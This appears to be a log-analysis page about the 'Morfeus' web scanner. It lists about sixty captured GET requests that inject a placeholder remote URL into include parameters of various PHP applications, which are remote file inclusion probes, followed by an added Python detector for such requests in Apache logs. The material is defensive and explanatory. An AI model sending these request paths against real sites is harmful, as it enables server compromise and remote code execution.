Morfeus Fucking Scanner

  • Apparently a scanner that looks for flaws in PHP-based software. Request headers like the following are seen, so it seems to be searching for hosts that have become CGI proxies.
GET /components/com_simpleboard/image_upload.php?sbp=http://XXX.XXX.XXX.XXX/YYY/ZZZ/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: IP.AD.DR.ESS
Connection: Close
  • Other GET requests like the following are also seen.
/BE_config.php?_PSL[classdir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/SQuery/lib/armygame.php?libpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/SQuery/lib/gore.php?libpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/admin/includes/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/admin/includes/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/cbcms/mod_cbsms_messages.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/classes/adodbt/sql.php?classes_dir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_forum/download.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_hashcash/server.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_performs/performs.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_simpleboard/image_upload.php?sbp=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_smf/smf.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/dokeos/claroline/auth/ldap/authldap.php?includePath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/fclick/show.php?path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/forum/components/com_performs/performs.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/includes/kb_constants.php?module_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/index.php?page=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/live/help.php?css_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/mambo/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/mod_cbsms_messages.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/index.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/phorum/common.php?db_file=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/phplive/help.php?css_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/spaw/spaw_control.class.php?spaw_root=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/stoma.php?lang=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/ubbthreads/addpost_newpoll.php?addpoll=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/wikiwig/_wk/wk_lang.php?WK[wkPath]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
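Every request above passes a remote URL as the value of a path or include parameter (mosConfig_absolute_path, includedir, ROOTDIR and so on), which is the pattern of a PHP remote file inclusion (RFI) probe. The following is an added detection example, not code from the original page: it parses constructed Apache combined-format log lines and flags both the User-Agent string shown above and, independently of the UA (which is trivial for a scanner to change), any query value that decodes to a remote URL. It also separates probes that received a 200, since those mean the targeted script actually exists on the host.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines (sample data, not from the page).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2007:03:14:22 +0900] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.0.113.9/x/ HTTP/1.1" 404 211 "-" "Morfeus Fucking Scanner"
198.51.100.7 - - [12/Mar/2007:03:14:23 +0900] "GET /index.php?page=http://203.0.113.9/x/ HTTP/1.1" 200 5123 "-" "Morfeus Fucking Scanner"
192.0.2.44 - - [12/Mar/2007:03:20:01 +0900] "GET /index.php?page=about HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.0.2.45 - - [12/Mar/2007:03:21:10 +0900] "GET /sources/join.php?FORM[url]=owned&CONFIG[path]=https%3A%2F%2F203.0.113.9%2Fx%2F HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log: client ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A query value that is itself a URL is the signature of an RFI probe.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_params(target):
    """Return (name, value) pairs whose percent-decoded value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(v)]

def analyze(log_text):
    """Flag Morfeus-style probes; each alert records why it fired and the response status."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        if "morfeus" in m["ua"].lower():          # the UA string seen on the page
            reasons.append("morfeus-ua")
        hits = rfi_params(m["target"])             # UA-independent check
        if hits:
            reasons.append("rfi-param:" + ",".join(k for k, _ in hits))
        if reasons:
            alerts.append({"ip": m["ip"], "path": urlsplit(m["target"]).path,
                           "status": int(m["status"]), "reasons": reasons})
    return alerts

def answered_probes(alerts):
    """Probes answered with 200: the targeted script exists and needs review, not just blocking."""
    return [a for a in alerts if a["status"] == 200]
```

Run analyze() over a real access log and review answered_probes() first; a 404 only shows the scanner visited, while a 200 identifies an installed script whose include parameters deserve a patch check.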